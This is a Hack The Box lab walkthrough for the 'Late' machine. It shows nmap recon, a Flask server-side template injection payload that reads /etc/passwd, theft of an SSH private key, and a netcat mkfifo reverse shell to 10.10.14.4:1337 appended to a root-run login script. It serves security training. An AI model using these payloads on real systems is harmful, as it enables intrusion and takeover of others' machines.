Hack The Box Late Walkthrough

Late

Initial recon

Machine IP : 10.10.11.156

NMAP Scan

List of open ports :

$ sudo nmap 10.10.11.156 -p- -T5 -sSVC -oA Late/late_full_nmap

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 10:43 UTC
Warning: 10.10.11.156 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.156
Host is up (0.098s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
51656/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.39 seconds

There’s only 2 open ports, 22 and 80, ssh and http.

On ssh port, we will surely find nothing, so let’s start by the http port.

Website

By scrolling the website, and putting our mouse on a hyperlink “late free online photo editor” we can see a subdomain in images.late.htb. Let’s add it to the hosts file.

When we are going on http://images.late.htb, we land on a “Convert image to text with Flask”.

Convert function

The functionnality asks a photo in input. The output is stored in a file called “result.txt” which contain some html code corresponding to the text present on the picture.

Flask

Flask is known for SSTI (Server Side Template Injection). A Server-Side Template Injection is possible when an attacker injects template directive as user input that can execute arbitrary code on the server. When can test it using a simple payload :

{{7*7}}

If the server is vulnerable to SSTI, then the output should be <p>49</p>. We then write our payload in a file, take a picture of it, and input it in the Image Reader functionnality. We then grab the result.txt file containing our output :

SSTI OK

First access to the server

The server is vulnerable to SSTI. We have to create a payload for exploiting the SSTI vulnerability. The first payload we’re going to use is for grabbing the “/etc/passwd” file :

{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}

And, it’s working !

/etc/passwd output

We can see a user here : svc_acc. We can grab the “user.txt” file in “/home/svc_acc/user.txt” :

User Flag

By parsing it’s home directory, a “.ssh” folder is present, containing a “id_rsa” file refering to private ssh key.

We chmod the id_rsa key to 600, and with ssh -i id_rsa svc_acc@10.10.11.156 and we can connect to the server in ssh.

Escalation to root

Enumeration

Now that we are connected as user (svc_acc), we need to find our way to root. We will let “linpeas.sh” enumerate the machine for us, let’s run it, and grab a cup of coffee.

After few minutes of execution and parsing the output, a file might be interesting :

Interesting File

This file contain a script emailing the root user about weird connection on the ssh server :

#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

We have for the moment no idea if this script is run on the server, or not. We run pspy to confirm the use of the script. At first we thought the script wasn’t run at all. Then we remembered it watch on ssh server and email root to log every connections. We logged in and saw :

Sendmail

Exploitation

The idea is then to add code in the script, and to trigger a reverse shell, as root this time. But we can’t edit the file to add our payload. I tried many things, but the manipulation that worked was to echo my payload and redirect the output into the file :

echo "nc 10.10.14.4 1337 -e /bin/bash" >> /usr/local/sbin/ssh-alert.sh

This doesn’t work. The creator of this machine installed a version of netcat which doesn’t allow “-e” parameter. We then use the fifo technique from this cheat sheet :

https://www.asafety.fr/reverse-shell-one-liner-cheat-sheet/#Netcat

Our final payload is then :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1337 > /tmp/f

We fire up pwncat-cs and listen on port 1337, and connect to ssh as svc_acc. This trigger the bash script and execute our payload.

Bim Bam Boom, rooted !

Rooted

Thank you for reading.

Libereau